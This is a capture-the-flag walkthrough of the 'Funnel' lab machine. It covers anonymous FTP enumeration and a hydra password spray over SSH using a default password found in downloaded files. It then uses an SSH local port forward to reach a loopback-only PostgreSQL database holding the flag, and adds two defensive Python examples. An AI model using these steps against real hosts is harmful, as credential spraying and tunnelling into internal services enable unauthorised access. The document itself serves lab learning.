Introduction
Last time, we took a peek at a poorly misconfigured Windows machine. Today, we will switch things up a bit and take a look at the machine Funnel. This is a beginner-level machine that primarily explores port forwarding and tunneling in order to reach services on a host that are not exposed to the network. Let’s get to pwning!
Task 1:
Simple nmap -sC -sV -sT scan output:
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 ftp ftp 4096 Nov 28 2022 mail_backup
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:{KALI MACHINE}
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
How many TCP ports are open?
Answer: 2
Task 2:
Typically, FTP servers that allow anonymous access accept the username anonymous with an empty (or arbitrary) password for public resources, and the nmap ftp-anon script above already reported that this server does.
ftp {MACHINE IP HERE}
Connected to {MACHINE IP HERE}
220 (vsFTPd 3.0.3)
Name (MACHINE IP HERE:kali): anonymous
331 Please specify the password.
Password: <blank password>
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||64514|)
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Nov 28 2022 mail_backup
226 Directory send OK.
ftp>
What is the name of the directory that is available on the FTP server?
Answer: mail_backup
Task 3:
After downloading the goodies found on the server, we uncover some vital information.
ftp> cd mail_backup
250 Directory successfully changed.
ftp> dir
229 Entering Extended Passive Mode (|||59181|)
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 58899 Nov 28 2022 password_policy.pdf
-rw-r--r-- 1 ftp ftp 713 Nov 28 2022 welcome_28112022
226 Directory send OK.
ftp> get password_policy.pdf
local: password_policy.pdf remote: password_policy.pdf
229 Entering Extended Passive Mode (|||23373|)
150 Opening BINARY mode data connection for password_policy.pdf (58899 bytes).
100% |*****************| 58899 324.14 KiB/s 00:00 ETA
226 Transfer complete.
58899 bytes received in 00:00 (169.87 KiB/s)
ftp> get welcome_28112022
local: welcome_28112022 remote: welcome_28112022
229 Entering Extended Passive Mode (|||61040|)
150 Opening BINARY mode data connection for welcome_28112022 (713 bytes).
100% |*****************| 713 12.86 KiB/s 00:00 ETA
226 Transfer complete.
713 bytes received in 00:00 (3.84 KiB/s)
ftp>
What is the default account password that every new member on the “Funnel” team should change as soon as possible?
Answer: funnel123#!#
Task 4:
Password cracking time! Create a new file called usernames.txt containing the names found in the welcome document.
optimus
albert
andreas
christine
maria
Next, spin up hydra.
$ hydra -L usernames.txt -p 'funnel123#!#' {MACHINE IP HERE} ssh
.. Snipping verbose hacker text ..
[22][ssh] host: {MACHINE IP HERE} login: christine password: funnel123#!#
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-08-21 00:47:28
Which user has not changed their default password yet?
Answer: christine
Task 5:
ss - another utility to investigate sockets
Once successfully logged in as christine, run ss -tln to list every listening TCP port on the server. Run it again without the -n (ss -tl) so that ss resolves each port number to its service name.
Local Address:Port
127.0.0.53%lo:53
0.0.0.0:22
127.0.0.1:5432
127.0.0.1:36893
*:21
[::]:22
Which service is running on TCP port 5432 and listens only on localhost?
Answer: postgresql
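As an added example (not part of the writeup), a short Python script that parses ss -tln output like the listing above and separates loopback-only listeners from ones reachable from the network; the sample output is constructed to match the ports seen on Funnel, and the small port-name table stands in for the /etc/services lookup ss performs when -n is omitted.

```python
"""Classify listeners from `ss -tln` output by bind scope (added example)."""
# Constructed sample modelled on the Funnel listing; the State, Recv-Q,
# Send-Q and Peer columns are the ones the real tool prints.
SS_TLN_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       4096    127.0.0.53%lo:53     0.0.0.0:*
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
LISTEN  0       244     127.0.0.1:5432       0.0.0.0:*
LISTEN  0       4096    127.0.0.1:36893      0.0.0.0:*
LISTEN  0       32      *:21                 *:*
LISTEN  0       128     [::]:22              [::]:*
"""

# Subset of /etc/services, which is what `ss -tl` consults when -n is omitted.
KNOWN_PORTS = {21: "ftp", 22: "ssh", 53: "domain", 5432: "postgresql"}


def bind_scope(addr: str) -> str:
    """Map a local address to 'all-interfaces', 'loopback' or 'specific'."""
    addr = addr.split("%", 1)[0].strip("[]")  # drop '%lo' scope id and IPv6 brackets
    if addr in ("0.0.0.0", "*", "::"):
        return "all-interfaces"
    if addr.startswith("127.") or addr == "::1":
        return "loopback"
    return "specific"


def parse_ss_tln(text: str) -> list[tuple[int, str, str]]:
    """Return (port, service, scope) for every LISTEN row, skipping the header."""
    rows = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        addr, port = fields[3].rsplit(":", 1)  # rsplit keeps '[::]:22' intact
        port = int(port)
        rows.append((port, KNOWN_PORTS.get(port, "unknown"), bind_scope(addr)))
    return rows


def exposed_ports(text: str) -> set[int]:
    """Ports reachable from the network: bound to a wildcard address."""
    return {port for port, _, scope in parse_ss_tln(text) if scope == "all-interfaces"}


def loopback_only(text: str) -> dict[int, str]:
    """Ports that only a local process (or an SSH tunnel) can reach."""
    exposed = exposed_ports(text)
    return {port: name for port, name, scope in parse_ss_tln(text)
            if scope == "loopback" and port not in exposed}
```

Running loopback_only(SS_TLN_OUTPUT) returns 5432 mapped to postgresql, which is the service the task asks about.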
Task 6:
Local port forwarding is quite easy to understand. SSH opens a listening port on our own machine (1234 below); anything we send to that port travels inside the SSH connection, and the SSH server on Funnel then relays it straight to localhost:5432, the PostgreSQL backend that only listens on loopback.
ssh -L 1234:localhost:5432 christine@{MACHINE IP HERE}
Since you can’t access the previously mentioned service from the local machine, you will have to create a tunnel and connect to it from your machine. What is the correct type of tunneling to use? remote port forwarding or local port forwarding?
Answer: Local Port Forwarding
Task 7:
Once logged in as christine on the PostgreSQL backend, running \l in psql will output a list of available databases, including one called secrets.
What is the name of the database that holds the flag?
Answer: secrets
Task 8:
Quick explanation:
Local port forwarding allows you to access a remote service locally as if it were directly reachable from your own computer. Port forwarding creates what is known as a tunnel, which, simply put, is the encapsulation of data traveling from one point to another inside the SSH connection.
-L Command:
ssh -L 8080:localhost:3306 user@remote-server
Dynamic port forwarding is a bit more interesting. Here the SSH client starts a SOCKS proxy on your local machine; any client pointed at that proxy has its connections carried through the SSH session and opened from the remote server, so you are not limited to one destination chosen in advance. There is also the added factor of increased anonymity, since the traffic appears to originate from the remote server.
-D Command:
ssh -D 8080 user@remote-server
Would you use a dynamic tunnel instead of local port forwarding? Yes or No.
Answer: Yes
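As an added example (not from the writeup), the server-side view of Tasks 6 and 8: a Python audit that reads the global section of an sshd_config and reports which forwarding types (-L/-D versus -R) and which destinations sshd will allow. The directive names and defaults are OpenSSH's own; both config samples and the group name are constructed for the example.

```python
"""Report which SSH port-forwarding types an sshd_config permits (added example)."""
import re

# OpenSSH defaults that apply when a directive is absent or commented out.
OPENSSH_DEFAULTS = {"allowtcpforwarding": "yes", "permitopen": "any", "gatewayports": "no"}

# Constructed sample: forwarding left at its defaults, which is what lets
# `ssh -L 1234:localhost:5432` reach a loopback-only service on the server.
PERMISSIVE_CONFIG = """\
#AllowTcpForwarding yes
#GatewayPorts no
PasswordAuthentication yes
"""

# Constructed hardened variant: -L/-D may only target the database port, -R is off.
HARDENED_CONFIG = """\
AllowTcpForwarding local
PermitOpen localhost:5432
Match Group contractors
    AllowTcpForwarding no
"""

def parse_global_section(text: str) -> dict[str, str]:
    """Lowercased keyword -> value for the global section; the first value wins,
    as in sshd. Parsing stops at the first Match block (per-connection overrides)."""
    seen: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # 'Key value' or 'Key=value'
        key = parts[0].lower()
        if key == "match":
            break
        seen.setdefault(key, parts[1].strip() if len(parts) > 1 else "")
    return seen

def forwarding_policy(text: str) -> dict[str, object]:
    """Summarise what -L/-D (local) and -R (remote) forwarding the server allows."""
    cfg = {**OPENSSH_DEFAULTS, **parse_global_section(text)}
    mode = cfg["allowtcpforwarding"].lower()
    local_ok = mode in ("yes", "all", "local")  # ssh -D counts as local forwarding
    remote_ok = mode in ("yes", "all", "remote")
    return {
        "local_forwarding": local_ok,
        "remote_forwarding": remote_ok,
        "permitted_destinations": cfg["permitopen"] if local_ok else "none",  # PermitOpen limits -L/-D targets
        "remote_listeners_on_network": remote_ok and cfg["gatewayports"].lower() != "no",
    }
```

The Match block in the hardened sample is deliberately left unevaluated: a fuller audit would apply such blocks per user or group on top of the global result.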
Task 9:
Connect to the secrets database using \c secrets. You then will want to run \dt to take a gander at the available tables. Lo and behold, a flag table is sitting right in plain view! Run the conventional SQL SELECT command to grab the flag.
Just like that, machine pwned.
Submit root flag
Answer: cf2*****************************